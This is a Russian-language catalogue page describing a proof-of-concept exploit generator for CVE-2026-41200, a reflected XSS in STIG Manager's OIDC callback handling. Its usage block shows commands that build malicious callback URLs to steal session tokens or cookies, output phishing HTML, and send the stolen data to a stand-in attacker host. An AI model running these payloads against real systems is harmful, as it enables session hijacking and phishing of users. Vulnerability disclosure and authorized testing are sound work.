Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2026-41200-stig-manager-oidc-reflected-xss — Генератор эксплоитов доказательства концепции для отражённого XSS в аутентификации OIDC STIG Manager, позволяющий красть токены сессии через поддельные callback-URL и вывод фишингового HTML. | Kitploit
Инструменты/GitHubGitHub/hunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss
Инструменты фишингаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubhunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss

cve-2026-41200-stig-manager-oidc-reflected-xss

Генератор эксплоитов доказательства концепции для отражённого XSS в аутентификации OIDC STIG Manager, позволяющий красть токены сессии через поддельные callback-URL и вывод фишингового HTML.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 месяцев назадЕщё не проверено

CVE-2026-41200 — STIG Manager OIDC Отражённая XSS PoC

Концептуальное доказательство уязвимости отражённого межсайтового скриптинга (XSS) в STIG Manager версий 1.5.10 – 1.6.7.

Сводка уязвимости

Уязвимость отражённого XSS существует в коде обработки ошибок аутентификации OIDC веб-приложения STIG Manager. Параметры запроса error и error_description, возвращаемые провайдером OIDC, записываются напрямую в DOM через innerHTML без экранирования HTML. Злоумышленник, который может создать вредоносный URL и убедить пользователя перейти по нему, может выполнить произвольный JavaScript в контексте приложения.

Уязвимость наиболее серьезна, когда у целевого пользователя есть активная сессия STIG Manager в другой вкладке браузера — внедренный код может взаимодействовать с SharedWorker, управляющим токеном доступа, что позволяет отправлять аутентифицированные API-запросы от имени жертвы.

  • CVE: CVE-2026-41200
  • CVSS 4.0: 8.5 (ВЫСОКИЙ)
  • Затронуты: NUWCDIVNPT/stig-manager >= 1.5.10, < 1.6.8
  • Исправлено: v1.6.8
  • Консультация: GHSA-wg33-j3rv-jq72
  • Статья: hunt-benito.com

Использование

root@kitploit:~
# Генерация вредоносного callback URL (режим кражи токена SharedWorker)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker

# Генерация простой полезной нагрузки для кражи cookie
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple

# Вывод в виде фишингового HTML
python3 cve-2026-41200-poc.py --format html

# Пользовательские API и хосты для эксфильтрации
python3 cve-2026-41200-poc.py \
  -c https://stig-manager.example.com/auth/callback \
  -a https://stig-manager.example.com \
  -e https://attacker.example.com

Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованных исследований безопасности.

  • Используйте только против установок, которыми вы владеете или имеете явное разрешение на тестирование.
  • Несанкционированный доступ к компьютерным системам незаконен в большинстве юрисдикций.
  • Авторы не несут ответственности за неправильное использование этого инструмента.
Скачать инструмент